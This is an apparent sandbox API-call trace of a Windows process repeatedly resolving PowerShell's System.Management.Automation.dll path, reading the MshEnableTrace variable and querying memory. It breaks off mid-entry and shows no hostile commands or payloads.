[0136.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.736] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.736] CoTaskMemFree (pv=0x10c990) [0136.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, 
lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, 
lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | 
out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.801] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, 
__alignment2=0x0)) returned 0x30 [0136.802] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.802] CoTaskMemFree (pv=0x10c990) [0136.807] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0136.831] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.831] CoTaskMemFree (pv=0x10c990) [0136.833] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.833] CoTaskMemFree (pv=0x10c990) [0136.834] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.834] CoTaskMemFree (pv=0x10c990) [0136.838] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.838] CoTaskMemFree (pv=0x10c990) [0136.844] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.845] CoTaskMemFree (pv=0x10c990) [0136.845] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.846] CoTaskMemFree (pv=0x10c990) [0136.853] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, 
